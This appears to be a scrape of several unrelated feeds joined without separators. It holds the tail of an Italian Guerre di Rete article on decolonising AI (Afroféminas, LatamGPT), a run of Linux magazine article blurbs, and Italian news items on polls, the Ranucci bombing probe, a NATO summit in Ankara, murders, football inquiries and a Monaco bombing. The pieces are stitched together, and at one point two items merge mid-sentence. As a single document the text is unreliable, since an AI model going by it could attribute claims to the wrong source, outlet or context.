Afroféminas è un “ecosistema” (così lo definisce Torres Soler) composto da quattro strumenti con funzioni diverse: AfroféminasGPT, il GPT Socratico di Afroféminas (pensato per studenti e insegnanti, che invita a “pensare prima di creare, applicando una conoscenza etica, affettiva e consapevole”), il GPT di Assistenza per i Reati d’Odio e Parla con Afroféminas (Habla con Afroféminas). Quest’ultimo è integrato direttamente su afrofeminas.com ed è accessibile senza la necessità di un account ChatGPT, il che, secondo la fondatrice “rappresenta un primo passo verso una maggiore sovranità rispetto all’infrastruttura di OpenAI”.
Anche AfroféminasGPT non ha accesso a Internet: “Ciò significa che non assorbe continuamente nuovi dati e bias a ogni aggiornamento di ChatGPT. Al contrario, quando cerca una risposta, attinge a una base di conoscenza volutamente circoscritta: un corpus curato di circa venti testi e autorialità fondamentali del pensiero nero e decoloniale. È questo a determinare come argomenta, come ragiona e da quale prospettiva risponde. È ciò che la rende diversa”, conclude Torres Soler.
Nel caso di Meedan e del collettivo Afroféminas, la parziale riprogettazione dei sistemi di AI ha dei chiari limiti di scala: si tratta di piccole organizzazioni, con risorse limitate. Cosa succede, invece, se si ragiona in termini di intelligenze artificiali come infrastruttura pubblica?
Una possibile risposta è stata testata da un consorzio latinoamericano di enti pubblici, università e centri di ricerca con il lancio di LatamGPT, il grande esperimento di modello linguistico collaborativo e open source della regione. LatamGPT è stato lanciato ufficialmente il 26 febbraio 2026 dall’allora presidente cileno Gabriel Boric. Il progetto è coordinato dal Centro Nazionale per l’Intelligenza Artificiale del Cile (CENIA) e ad esso partecipano quindici paesi e oltre 200 ricercatori di varie nazionalità.
Il modello è addestrato su un corpus regionale di oltre 300 miliardi di token (gli elementi linguistici alla base dell’addestramento della IA) provenienti da venti paesi dell’America Latina e dei Caraibi. L’obiettivo è anche quello di colmare un divario linguistico. Al momento, per i modelli commerciali, la percentuale di dati in lingua spagnola e portoghese si attesta infatti intorno al 2-3%.
LatamGPT non è un chatbot direttamente utilizzabile con un’interfaccia, ma un’infrastruttura open source che enti governativi, sviluppatori e istituzioni possono adattare alle loro esigenze educative, sanitarie o di protezione del patrimonio culturale. Si tratta di una base per lo sviluppo di applicazioni, prima che di un’applicazione in sé.
Il valore del progetto sta anche nel suo contributo alla ricerca. Alvaro Soto, direttore del CENIA, ha spiegato, parlando con Wired: “Siamo noi i soggetti indicati per occuparci delle nostre stesse necessità. Non possiamo stare seduti ad aspettare che gli altri abbiano il tempo di chiederci di che cosa abbiamo bisogno. Oggi gli accademici dell’America Latina hanno poche opportunità di interagire profondamente con questi modelli. È come voler studiare la risonanza magnetica senza avere a disposizione un risonatore. LatamGPT vuole essere lo strumento fondamentale che consente alla comunità scientifica di sperimentare e progredire”.
Il ricercatore Eduardo Levy Yeyati ha commentato, in un articolo su Brookings: “Ciò che rende straordinario LatamGPT non è la sua architettura tecnica, ma la sua coordinazione istituzionale. In una regione in cui la collaborazione transfrontaliera spesso si arena, la progettazione di LatamGPT riflette la diversità istituzionale del territorio. Fornisce una base condivisa che può essere ottimizzata per le priorità nazionali, come per esempio documenti legali argentini, cartelle cliniche colombiane e programmi scolastici messicani”.
I limiti dei modelli alternativi
Più che la volontà politica, il problema principale resta l’accesso alle risorse. LatamGPT è stato costruito a partire da Llama 3.1, il modello open-weight di Meta e, nella sua prima fase di sviluppo, ha fatto ricorso anche all’infrastruttura cloud di Amazon Web Services. La dipendenza, almeno iniziale, dalle tecnologie e dalle infrastrutture delle Big Tech appare quindi difficile da evitare.
Non solo: un corpus regionale di oltre 300 miliardi di token è notevolmente più piccolo rispetto alla mole di dati a disposizione dei principali laboratori statunitensi e cinesi. Lo stesso vale per i finanziamenti: il progetto LatamGPT ha raccolto circa 550mila dollari (tra fondi CENIA e quelli della Latin America Development Bank) di investimenti iniziali. Si tratta di cifre irrisorie se paragonate agli investimenti da svariati miliardi di dollari delle aziende statunitensi e cinesi.
Infine, c’è un dilemma simile a quello dell’uovo e della gallina, ma in versione tecnologica: “Gli sviluppatori costruiscono solo se gli utenti cambiano piattaforma, e gli utenti cambiano piattaforma solo se gli strumenti sono migliori”, spiega ancora Levy Yeyati su Brookings. “Risolvere questo problema richiede qualcosa in più delle semplici prestazioni: servono un sostegno istituzionale e un ecosistema regionale, specialmente da parte dei paesi che lavorano per progettare e integrare queste scelte strutturali”.
Insomma, prima di poter davvero costruire alternative concrete a Big Tech ci sono vari ostacoli da superare, sia tecnici che economici. Le pratiche di riappropriazione, da quelle più piccole a quelle più ambiziose, hanno un significato politico ed etico innegabile. Ma continuano a scontrarsi con un divario di potere, risorse tecniche e investimenti che al momento appare difficile da colmare.
L'articolo È possibile decolonizzare l’intelligenza artificiale? proviene da Guerre di Rete.

This month we explore Archcraft 2026.05.12, NetHydra 2026.2, PrismLinux 2026.05.05, and ZenLake OS 26.04.
This simple dashboard tool keeps you up to date on everything from system information to soccer scores.
This month we explore the top FOSS, including one of the great ebook managers, an anarcho-pacifist Doom clone, and a Monero CPU miner.
With gocryptfs, you can avoid security breaches by encrypting files on your hard disk before uploading them to the cloud.
Open source software has always served as an equalizing force in the IT space. When one company or group gets too much power, the open source ecosystem offers a head start to others who wish to oppose that dominance.
To help Mike Schilli finish watching the movies he's already started, a Go TUI assists him with cross-service home theater scheduling and timekeeping.
A conventional PC and the Raspberry Pi have many things in common, but the single-board computer does not natively support UEFI boot. For some models, you can change that.
This month in Linux Voice.
Old-school performance monitoring won't cut it for today's complex configurations. Extended Berkeley Packet Filter and its suite of surrounding tools are here to help.
A good plan – and FOSS – can pave the way to the security, simplicity, and local financial benefit of tech sovereignty.
Use Meld to visually compare files and directories, resolve complex three-way merge conflicts, and audit your code repositories via a visually appealing, color-coded, side-by-side interface.
bitVox, a small voice assistant built on a 2011 Raspberry Pi Model B, separates hardware control, speech processing, intent routing, and skills into plain Linux processes, allowing you to read, test, and modify one piece at a time.
We take a close look at the Socket Statistics utility ss and show why it is better than netstat for forensics, troubleshooting, and other networking tasks.
In the news: KDE Linux Drops AUR; California May Exempt Linux from Its Age-Verification Law; Another Logic Bug Found in Linux Kernel; Ubuntu Core 26 Offers Game-Changing Enterprise Features; Flooding the Linux Kernel Security Mailing List; Top Priorities for Open Source Pros Seeking a New Job; Container-Based Fedora Hummingbird Designed for Agent-First Builders; and Linux Kernel Developers Considering a Kill Switch.
Firefox 148 introduced an option called "Block AI enhancements." What does that mean, is it really a "kill switch" for AI, and does Firefox live up to its reputation as a browser that exists beyond corporate control? We decided to start up Wireshark and find out.
If you're looking for a laptop with tons of power and battery, look no further than the latest iteration of the System76 Lemur Pro.
On Tuesday, Micheál Martin set out Ireland’s priorities: to enhance EU competitiveness, values, and security, under the banner of “strength with unity”.
Risarcimenti più semplici e veloci per i ritardi, posti gratuiti per i bambini e bagaglio a mano incluso entrano nella nuova legge UE sui diritti dei passeggeri aerei.Quale profilo, quali caratteristiche dovrebbe avere il prossimo Presidente della Repubblica? Quale provenienza politica dovrebbe vantare nel curriculum? Sicuramente non dovrà essere una figura divisiva per gli italiani intervistati nel sondaggio SWG dopo che la Presidente del Consiglio Giorgia Meloni ha letteralmente aperto la campagna per il Quirinale verso il 2029 mentre già è aperta quella per le politiche in programma nel 2027 e si discute della legge elettorale che sarà impiegata l’anno prossimo.
Prima caratteristica, dunque, per il 56% degli italiani, è che il futuro Capo dello Stato non dovrà essere una figura divisiva. Per il 54% dovrebbe vantare prestigio internazionale, per il 32% dovrebbe vantare una lunga esperienza politica. E in pole position, nel toto-nomi, spicca il nome dell’ex Presidente del Consiglio Mario Draghi, con il 48% degli italiani che lo trovano adeguato. Seguono l’attuale premier Meloni (38%), Pierluigi Bersani (35%), Paolo Gentiloni (28%). In fondo alle preferenze il quotatissimo Pier Ferdinando Casini (25%) e Romano Prodi (24%).
Per il 32% degli italiani non avrà importanza lo schieramento politico del nuovo Presidente della Repubblica, l’importante è che sia una figura adatta alla carica. Per il 22% dovrebbe provenire dal centrodestra, per 13% dovrebbe essere un politico mai schierato né da una parte né dall’altra, per appena il 12% dovrebbe arrivare dal centrosinistra, per l’11% dovrebbe essere una figura esterna alla politica.
Mario Draghi è ritenuto il futuro Presidente della Repubblica più adeguato (48%). Seguono Giorgia Meloni (38%) e Pier Luigi Bersani (35%) pic.twitter.com/WFQjJsfkXc
— SWG (@swg_research) July 7, 2026
A richiamare l’attenzione negli orientamenti di voto rilevati per il TgLa7 il segno di crescita che riguarda Futuro Nazionale, in salita dello 0,4%, fino al 6%. Sempre in vantaggio sulla Lega scavalcata che pure guadagna uno 0,2%, il Carroccio è al 5,6%. Segno negativo invece sia per la Presidente Meloni, con Fratelli d’Italia che scivola al 27,1%, che per la segretaria Elly Schlein, Partito Democratico al 21,5%, che per l’ex premier Giuseppe Conte, Movimento 5 Stelle al 13,1%.
Seguono Forza Italia e Alleanza Verdi Sinistra, in lieve risalita al 7,4% e al 6,5%. Azione di Carlo Calenda è al 3,4%, Italia Viva al 2,5%, +Europa all’1,4%, Noi Moderati all’1,1% Stabili in fondo al listone Sud Chiama Nord all’1% e Avanti – PSI all’1%. Alla generica voce “altro partito” il 2,4%. Non si esprime il 27% degli intervistati, a conferma degli alti tassi di astensionismo nell’elettorato italiano a ogni appuntamento alle urne.
Intenzioni di voto SWG per @TgLa7 pic.twitter.com/BtHPRg9PRS
— SWG (@swg_research) July 6, 2026
L’amico Valter Lavitola dietro l’attentato dinamitardo che ha fatto saltare in aria le sue due auto di fronte l’abitazione di famiglia a Campo Ascolano, la frazione del comune di Pomezia, alle porte di Roma. Per la Procura di Roma è il giornalista-editore, in passato molto vicino a Silvio Berlusconi e con due condanne passate in giudicato, oggi titolare di un ristorante di pesce non lontano da Trastevere, il mandante della bomba contro il conduttore di Report Sigfrido Ranucci. A Lavitola e ai suoi complici i magistrati della Direzione distrettuale antimafia della Procura di Roma contestano il reato di tentata strage, detenzione, porto e impiego illegale di esplosivi, danneggiamento aggravato e minaccia aggravata, tutti contestati con l’aggravante del metodo mafioso. I carabinieri del Nucleo Investigativo di Roma e Frascati hanno perquisito l’abitazione dell’ex direttore L’Avanti! e hanno sequestrato telefoni e pc, che saranno analizzati.
“Sono sconvolto, siamo amici, adesso voglio capire. Per me Valter è un amico, dal 2019 ci sentivamo quasi tutti i giorni. Sono sconvolto, sconcertato, non so che cosa pensare, se non che mi affido alle indagini della Procura e dei Carabinieri. In questo momento non mi sento di rilasciare altre dichiarazioni”, sono le parole raccolte da Repubblica e Corriere della Sera da Ranucci dopo l’indagine a carico di Lavitola.
Dei rapporti tra Lavitola e Ranucci si era occupato il quotidiano Il Riformista, pubblicando la foto di una cena tra i due la sera del 21 maggio 2023 al ristorante “Cefalù” nel quartiere romano di Monteverde, di proprietà di Lavitola, insieme a monsignor Giovanni Fusco, collaboratore del cardinale segretario di Stato vaticano Pietro Parolin, e ad altri commensali. All’epoca Ranucci accusò via sms Matteo Renzi, l’ex premier che a quei tempi era direttore del quotidiano, di averlo esposto a un rischio pubblicando la foto di quell’incontro essendo sotto scorta.
A Lavitola gli inquirenti sono arrivati dopo gli arresti della scorsa settimana del commando che ha materialmente piazzato l’ordigno esplosivo: analizzando telefoni, contatti e computer dei quattro, gli investigatori avrebbero ricostruito due ulteriori livelli dell’organizzazione, con gli arrestati che facevano riferimento ad un intermediario, un cittadino di origine camerunense che lavorava nel ristorante di Lavitola, a sua volta in contatto proprio con Lavitola.
Quel che non è ancora chiaro è il movente, cosa abbia spinto Lavitola ad assoldare il commando e collocare l’ordigno davanti la casa dell’”amico” Ranucci. Secondo Il Fatto Quotidiano, giornale molto vicino al giornalista, non risulterebbero inchieste in corso o servizi su Lavitola da parte di Report, con Ranucci che d’altra parte ha ammesso di essere amico dell’ex faccendiere condannato tra le altre cose a due anni e 8 mesi per tentata estorsione ai danni di Berlusconi nella vicenda che lo vede coinvolto insieme all’imprenditore Giampaolo Tarantini nel giro di escort per le famose “cene eleganti”.
Il motto è stato coniato. Ed è molto suggestivo e ambizioso. La sua traduzione operativa, beh, questo è tutt’altro discorso. Molto, molto complicato. “Un’Europa più forte in una Nato più forte”. È il motto contenuto nella dichiarazione finale approvata dai 32 ambasciatori alleati e, a ben vedere, il senso del vertice di Ankara sta tutto qui. Tener fede alle promesse dell’anno scorso, far vedere agli Usa e a Donald Trump che il vecchio mondo sta davvero aprendo i cordoni della borsa, tracciando percorsi “credibili” verso il famoso 5% di Pil in difesa.
Il segretario generale Mark Rutte (e gli sherpa) hanno fatto il possibile per costruire un summit (l’ennesimo) a prova di Trump. Ma l’apprensione è palpabile perché se il tycoon deraglierà si potrà entrare in una fase che alcuni, alla Nato, non esitano a definire “pericolosa”. Oggi in una Ankara super blindata – centinaia i manifestanti anti-vertice arrestati – prima dell’arrivo dei leader, si terrà un gigantesco forum dell’industria della difesa transatlantica in cui verranno annunciati contratti, intese e cooperazioni per miliardi e miliardi: è uno degli spettacoli pirotecnici organizzati per stuzzicare l’immaginazione di Trump. Poi c’è la cena al palazzo presidenziale del Sultano, Recep Tayyip Erdoğan. Lì i 32 capi di Stato e di Governo alleati saranno soli – senza ambasciatori o consiglieri – con mogli (o mariti) e gli ospiti, tra cui ad esempio Volodymyr Zelensky.
In parallelo, le cene dei ministri degli Esteri e della Difesa, dove sono stati invitati, rispettivamente, i Paesi del Golfo e i partner asiatici (Giappone, Corea, Australia e Nuova Zelanda). Mercoledì sarà la volta del vertice vero e proprio: un giro di tavolo del Consiglio Atlantico da 2-3 ore massimo, proprio per limitare il più possibile i rischi. Ecco, si capirà allora perché c’è chi vorrebbe abolire la ricorrenza annuale (gli Usa in primis ma non solo) e dunque l’edizione del 2027 prevista a Tirana è in bilico anche perché l’Albania è tra i Paesi che non è ancora al 2%. Il Paese candidato a egemone del nuovo corso della Nato 2.0 è senz’altro la Germania, che intende arrivare al 3,5% della difesa ‘core’ già nel 2029, con uno sforzo di bilancio mostruoso: nessuno, in Europa, ha una potenza di fuoco economica simile. Varsavia, pur con le debite proporzioni, è l’altro astro nascente della sicurezza continentale, che affianca i leader tradizionali, Francia e Gran Bretagna.
In questo quadro, l’incognita resta The Donald. «Putin vuole finire la guerra in Ucraina, lo vuole fortemente», proclama Trump nello Studio Ovale, nel giorno dell’ennesima strage di civili uccisi nei bombardamenti russi. «Anche Zelensky lo vuole, ne parleremo al vertice della Nato», ha aggiunto. “Tre settimane fa ho detto al presidente Xi che gli Stati Uniti hanno l’esercito più potente del mondo e non ha avuto nulla da obiettare”, ha fatto sapere il tycoon, riferendo del colloquio con il presidente cinese. A prendere la parola è anche il “cameriere” del tycoon a Bruxelles, al secolo Mark Rutte, segretario generale della Nato. Gli Usa non stanno «spaccando» la Nato, assicura Rutte nel corso della conferenza stampa prevertice, rispondendo ad una domanda sull’attacco di Hegseth alla scorsa ministeriale difesa. «Avere una revisione della postura e delle forze è una mossa saggia, sarà in consultazione con gli alleati, non c’è da preoccuparsi», ha aggiunto. Se lo dice lui…
Ad Ankara si disserta, in Ucraina si continua a morire. È di almeno 20 morti il bilancio degli attacchi russi della scorsa notte sull’Ucraina, che hanno preso di mira la capitale Kiev e la sua regione. Lo riferiscono le autorità locali, precisando che 14 persone sono morte a Kiev e altre 6 nella sua regione. L’aeronautica militare ucraina ha riferito che la Russia ha lanciato durante la notte 351 droni e 68 missili, prendendo di mira principalmente Kiev, e ha precisato che tutti i 29 missili balistici hanno colpito i loro obiettivi, sottolineando l’urgente necessità di un maggiore sostegno in materia di difesa. «Per intercettare i missili balistici, abbiamo bisogno dei mezzi per l’intercettazione», ha affermato il portavoce dell’aeronautica militare, Yurii Ihnat, parlando alla tv nazionale. «I russi stanno certamente sfruttando il fatto che ora vi sia una grave carenza di missili intercettori, sia in Ucraina che nel mondo», ha aggiunto.
In questo scenario devastato, Volodymyr Zelensky ha esortato i suoi alleati a prendere «decisioni forti» al vertice Nato «È di fondamentale importanza che il mondo, in primis gli Stati Uniti e i nostri partner europei, escano dal vertice Nato di Ankara con decisioni forti a sostegno della nostra difesa aerea», ha dichiarato il presidente ucraino sui suoi canali social. «Finché i missili Patriot rimarranno nelle scorte dei nostri alleati, la Russia è solo incoraggiata a continuare a `squarciare´ gli edifici residenziali. Stati Uniti e Europa hanno abbastanza forza per fermare questo terrore». La forza ce l’hanno. Quello che scarseggia è la volontà politica di esercitarla. E non solo a Washington. È il 1.594° giorno di guerra in Ucraina, ma Trump assicura: la fine della guerra è più vicina di quanto si crede. Sullo sfondo, il clamore dei missili che piovono su Kiev.
Si propende per la pista dell’omicidio a Sanremo, dove una donna di circa 59 anni è stata trovata morta nella serata di ieri. Sul corpo della donna i segni delle violenze: in particolare sul collo e sui polsi. Potrebbe esser stata strangolata. Al vaglio degli inquirenti anche la posizione del figlio della vittima. Accertamenti in corso, in corso le indagini condotte dai Carabinieri coordinati dalla Procura di Imperia.
L’omicidio si sarebbe consumato in un’abitazione in via Hope. Il cadavere della donna è stato scoperto intorno alle 22:00, quando i Vigili del Fuoco sono intervenuti sul posto su richiesta del figlio ventenne della vittima. Aveva riferito di non riuscire più a entrare in casa, la porta dell’appartamento era chiusa dall’interno e i pompieri sono entrati passando da un balcone e aprendo dall’interno.
Il figlio avrebbe raccontato agli investigatori di essere uscito di casa intorno alle 19:15 per andare a mangiare una pizza. Fonti della Procura di Imperia hanno confermato all’AdnKronos che il figlio sarà interrogato in mattinata dal pm Enrico Cinnella Della Porta, che coordina le indagini affidate ai Carabinieri. Stando ai primi accertamenti medico-legali, la morte risalirebbe ad almeno tre ore prima del ritrovamento. Il padre si trovava fuori casa.
L’episodio di Montesanto è stato raccontato, nelle prime ore, secondo uno schema ormai consolidato. Camorra, baby gang, stesa. Era quasi inevitabile, quando in una strada di Napoli compare un Kalashnikov il riflesso condizionato è quello di ricondurre tutto alla criminalità organizzata. Poi, con il passare delle ore, il quadro si è fatto più complesso. Le ricostruzioni parlano di una lite tra privati degenerata, di una vendetta personale. È il destino di molta cronaca: la prima narrazione è quasi sempre la più semplice, quella successiva è quasi sempre la più vera. Eppure il punto più interessante non è stabilire se dietro quell’episodio ci fosse o meno la camorra. Il punto è capire perché siamo costretti a scegliere tra due sole spiegazioni: o criminalità organizzata o gesto isolato.
È una falsa alternativa. Tra queste due narrazioni esiste un livello intermedio che raramente viene raccontato, ed è probabilmente quello più importante.
La sociologia urbana lo descrive attraverso il concetto di urban marginality. Non indica semplicemente quartieri poveri o periferie degradate, descrive piuttosto territori in cui la presenza dello Stato è discontinua, dove le istituzioni non riescono a esercitare con continuità la loro funzione di regolazione sociale e dove, di conseguenza, acquistano forza codici informali, relazioni personali, reputazione e rapporti di forza. In questi contesti la violenza non è necessariamente organizzata. Non è sempre pianificata. Ma non è nemmeno casuale. Diventa una risorsa disponibile.
Non perché interi quartieri siano assimilabili alla criminalità organizzata: diventa disponibile perché il conflitto quotidiano trova troppo spesso modalità di regolazione alternative a quelle offerte dalle istituzioni. È questo il livello intermedio che sfugge al dibattito pubblico. Il problema, allora, non è soltanto la presenza della criminalità, è la qualità della presenza dello Stato.
In molte aree di Napoli lo Stato non è assente in senso assoluto: fa arresti, indaga, interviene, ma troppo spesso è assente nella sua funzione più importante, quella ordinaria. Manca nella manutenzione dello spazio pubblico, nella continuità dei servizi, nella scuola, nelle politiche sociali, nella capacità di prevenire i conflitti prima che diventino materia di ordine pubblico. È una presenza intermittente. Compare nell’emergenza e scompare nella quotidianità.
È questa discontinuità a produrre quella condizione che la sociologia urbana definisce urban marginality: territori in cui il monopolio delle regole è incompleto e nei quali continuano a convivere norme ufficiali e codici informali. È qui che Napoli dovrebbe interrogarsi. Negli ultimi dieci anni la città ha conosciuto una trasformazione straordinaria. Il turismo è esploso. L’immagine internazionale è cambiata. Quartieri un tempo ignorati sono diventati mete globali. Napoli è tornata a essere desiderata. Ma una città non diventa davvero internazionale soltanto perché aumenta il numero dei visitatori. Lo diventa quando chi ci vive e chi la visita percepiscono la stessa cosa: che lo spazio pubblico appartiene alle regole comuni e non ai rapporti di forza. Il successo turistico rischia invece di convivere con una modernizzazione incompleta, nella quale il centro storico diventa una vetrina globale mentre persistono, spesso a pochi metri di distanza, forme di regolazione sociale che appartengono a un’altra idea di città. È questa la contraddizione che Montesanto porta alla luce. Racconta qualcosa di difficile da affrontare: una città che sta diventando globale molto più rapidamente di quanto riesca a diventare pienamente governata. Finché il conflitto continuerà a trovare soluzioni fuori dalle istituzioni, la modernità di Napoli resterà una fotografia splendida con una crepa che attraversa il paesaggio.
È ancora una volta il calciomercato a mettere nei guai il presidente del Napoli Aurelio De Laurentiis. L’imprenditore e il figlio Luigi sono indagati dalla Procura di Bari per bancarotta fraudolenta e false comunicazioni sociali in merito all’operazione che, nell’estate del 2023, portò al trasferimento del calciatore Elia Caprile dal Bari al Napoli. Stando alle accuse dei pubblici ministeri baresi l’operazione di cessione del portiere dal Bari al Napoli nel 2023, due società entrambe di proprietà della Filmauro spa, società della famiglia De Laurentiis, avrebbe provocato un ingiusto profitto nei confronti del Napoli.
Si tratta di una tesi nota ma difficilmente dimostrabile in sede giudiziaria. Secondo gli inquirenti nel giro di due anni il Napoli realizzò una plusvalenza di circa 7 milioni di euro: nel bilancio di esercizio del 2024 della Ssc Bari infatti non sarebbero evidenziati i criteri adottati per la determinazione del corrispettivo e la valutazione del potenziale valore futuro del calciatore, ceduto per 2,2 milioni di euro dalla società pugliese a quella campana. Il Napoli poi cedette Caprile al Cagliari per 8 milioni di euro: per la Procura quella plusvalenza sarebbe riconducibile a un percorso di valorizzazione sportiva che avrebbe potuto porre in essere il Bari.
Quanto all’ipotesi di bancarotta fraudolenta, per gli inquirenti il valore di 2,2 milioni di euro con cui Caprile fu ceduto dal Bari al Napoli non risponderebbe al valore effettivo dell’asset e, dunque, la mancata plusvalenza maturata dal Bari avrebbe causato un danno al patrimonio della società pugliese guida da Luigi De Laurentiis. L’inchiesta ha portato a perquisizioni nelle sedi delle due società da parte della finanza: i destinatari delle perquisizioni per questa vicenda (non indagati) sono i direttori sportivi del Bari,Ciro Polito e del Napoli Cristiano Giuntoli (fino al giugno 2023) e Mauro Meluso (da luglio 2023 a maggio 2024), oltre al procuratore sportivo di Caprile Graziano Battistini.
La Procura ha chiesto formalmente l’apertura della liquidazione giudiziale, una procedura che di fatto corrisponde alla richiesta di fallimento per la società biancorossa. L’inchiesta sul passaggio di Caprile dal Bari al Napoli si fonda infatti su una serie di approfondimenti della Guardia di Finanza sui bilanci del club pugliese, che secondo gli inquirenti si trova da tempo in una situazione di perdita sistemica con “rossi” accumulati tra il 2019 e il 2025 che avrebbero raggiunto la cifra di circa 30 milioni di euro. Un deficit accompagnato da un pesante indebitamento, a cui la proprietà non avrebbe contrapposto un piano concreto e solido per risanare i conti.
Per il patron del Napoli non è il primo problema con la giustizia legato alla compravendita di calciatori. Aurelio De Laurentiis nel novembre 2025 è stato rinviato a giudizio dal Gup di Roma per l’accusa di falso in bilancio in un procedimento che riguarda presunte plusvalenze fittizie legate agli acquisti dei calciatori Victor Osimhen (dal Lille nell’estate del 2020) e Kostas Manolas (dalla Roma nell’estate 2019).
A niente è servito tutto il polverone, il caso più clamoroso scoppiato ai Mondiali di calcio in corso tra USA, Canada e Messico, sollevato soltanto incidentalmente dal campo quanto piuttosto dalla Casa Bianca: da Donald Trump che in spregio a ogni pudore e formalità aveva telefonato alla FIFA per chiedere conto dell’espulsione del capocannoniere statunitense Folarin Balogun. E la FIFA aveva eseguito: squalifica sospesa all’attaccante americano per un anno, abile e arruolabile per gli ottavi di finale. E Belgio esterrefatto, UEFA all’attacco, ogni appassionato sconvolto, anche in Italia tra l’altro nei giorni dello scontro frontale con la Presidente del Consiglio Giorgia Meloni. 4 a 1 è finita ieri sera a favore dei Diables Rouges. Con Folarin in campo. USA fuori.
Poche ore prima della partita, dalla Casa Bianca, Trump aveva ammesso di aver telefonato alla FIFA per il cartellino rosso rimediato da Balogun per un intervento involontario ma pericoloso e scomposto nella partita contro la Bosnia Erzegovina. “Ho visto la partita, e capisco davvero bene lo sport. Quello non era un fallo; non era nemmeno un’infrazione. Erano due ragazzi che correvano a tutta velocità e che sono capitati a sbattere l’uno contro l’altro. Non puoi prendere il tuo piede e posizionarlo correttamente sul piede di qualcun altro. Questo arbitro è un po’ sospetto: se controlli il suo passato, non voglio dirlo perché non mi piace creare controversie, ma è molto sospetto”.
Anche Gianni Infantino, il presidente della FIFA, ieri aveva respinto le polemiche e aveva spiegato che ogni decisione presa dagli organi giudiziari della FIFA sono indipendenti, che “la loro indipendenza è essenziale per la credibilità e l’integrità del calcio”, che parla abitualmente con Trump e con altri Capi di Stato, funzionari governativi e stakeholder e che “quello che faccio sempre, però, è rispettare quelle decisioni e l’autonomia degli organi che le prendono. Che ci piaccia personalmente una decisione o no è irrilevante. Il rispetto per le istituzioni indipendenti e il rispetto della legge sono ciò che protegge l’integrità delle nostre competizioni e la credibilità della FIFA in ogni momento”. Aveva confermato la telefonata ma negato che abbia influito in qualche modo sulla decisione di sospendere la squalifica dell’attaccante.
La FIFA aveva così respinto il ricorso del Belgio, giudicato “inammissibile” in quanto la Nazionale “non è parte del procedimento e, pertanto, non ha titolo per impugnare la decisione” proprio mentre Trump spiegava e argomentava le ragioni della sua telefonata, ammettendo tra le altre cose che non conosceva il significato di un cartellino rosso nel gioco del calcio. “Non sapevo cosa significasse, non pensavo significasse molto. Poi ho iniziato a sentire che non può giocare nella prossima partita, almeno nella prossima partita. Quando prendono il tuo miglior giocatore e dicono che non puoi giocare è molto ingiusto. Un conto è penalizzare qualcuno per la partita, ma come fai a penalizzare per una partita che non è ancora stata giocata? È molto ingiusto. Quindi, sì, ho chiesto una revisione alla FIFA. Ho parlato con un uomo molto rispettato, per cui il livello di rispetto è aumentato di dieci volte”.
Alcuni avevano lanciato un appello all’allenatore degli USA, Mauricio Pochettino, affinché non schierasse Balogun che, nella notte italiana, alla fine ha giocato e non ha brillato. È stato giudicato come uno dei peggiori in campo. Due gol e un assist per Charles De Ketelaere, terzo gol di Hans Vanaen, nei minuti di recupero il quarto gol di Romelu Lukaku, attaccante del Napoli, ex Inter e Roma, che ha esultato con la “Trump Dance”. L’unico gol degli USA è stato segnato da Malik Tillman. “Ribalta questo”, ha postato l’account ufficiale del Belgio che ai quarti di finale giocherà contro la Spagna, il 10 luglio al Los Angeles Stadium, in California. Con l’uscita degli Stati Uniti tutte le nazionali dei Paesi organizzatori sono fuori dai Mondiali.
È stata trovata morta vicino Kiev, dove sarebbe stata uccisa a colpi d’arma da fuoco. Il corpo di Anastasia Berezovska, trentanovenne di nazionalità ucraina ma residente in Germania, considerata la principale sospettata dell’attentato dinamitardo di lunedì 29 giugno nel Principato di Monaco che ha gravemente ferito l’oligarca ucraino Vadim Ermolaev, la compagna e il figlio 13enne, è stato trovato privo di vita nei pressi della capitale dell’Ucraina. A riferirlo è il quotidiano ucraino Ukrainska Pravda citando le forze dell’ordine locali: il cadavere di Anastasia Berezovska è stato scoperto nella tarda serata del 6 luglio e, nell’ambito dell’inchiesta relativa alla sua morte, sarebbero già state arrestate due persone. Si tratta di un ufficiale in servizio della Direzione principale dell’intelligence militare ucraina (Gur) e un ex appartenente alle forze dell’ordine.
Nei confronti di Berezovska la Procura di Monaco aveva emesso un mandato d’arresto, notificato poi all’Interpol. La 39enne ucraina era stata inizialmente scambiata per un uomo a causa dei vestiti indossati: prima dell’attacco dinamitardo, come emerso dalle indagini condotte nel Principato, Berezovska avrebbe compiuto diversi sopralluoghi nei giorni e nelle ore precedenti l’attentato davanti alla casa dell’oligarca ucraino. Dopo aver piazzato la bomba era poi fuggita in Francia e da lì in Italia utilizzando un’auto recuperata a Beausoleil, in Francia, al confine con Monaco, dove era arrivata a piedi dopo l’attentato. Dal nostro Paese si sarebbe diretta verso la vicina Svizzera, per poi scomparire fino alla tarda serata di lunedì, quando il suo corpo è stato rinvenuto nei dintorni di Kiev.
La pista privilegiata dalla Procura di Monaco è quella di un’azione dimostrativa dei servizi segreti ucraini, per dare un segnale a tutti gli oligarchi come Ermolaev, quelli noti come “Battaglione Monaco” per la scelta di rifugiarsi nel Principato per sfuggire alle rappresaglie di Kiev. Ermolaev, dal 2019 in possesso di un passaporto cipriota, dal dicembre 2023 è sottoposto a sanzioni con un decreto del Consiglio di sicurezza nazionale ucriaino: il provvedimento, della durata di 10 anni, impone tra le altre cose il congelamento totale degli asset finanziari. L’accusa nei confronti dell’imprenditore riguarda le sue condotte illecite in Crimea: è nella regione ucraina sotto occupazione russa e dal 2014 annessa illegalmente da Mosca dopo un referendum farsa che le aziende di Ermolaev continuava a vendere propri prodotti, in particolare alcolici, nonostante il divieto imposto dal governo ucraino. Ermolaev ha sempre respinto ogni addebito, negando qualsiasi legame con la Crimea e col Cremlino.
Quando nel luglio del 2013 Papa Francesco scelse Lampedusa come primo viaggio del suo pontificato, non andò a parlare di immigrazione. Andò a parlare di indifferenza. Denunciò quella che definì la “globalizzazione dell’indifferenza”: uomini, donne e bambini che morivano nel Mediterraneo mentre l’Europa discuteva di quote, confini e procedure.
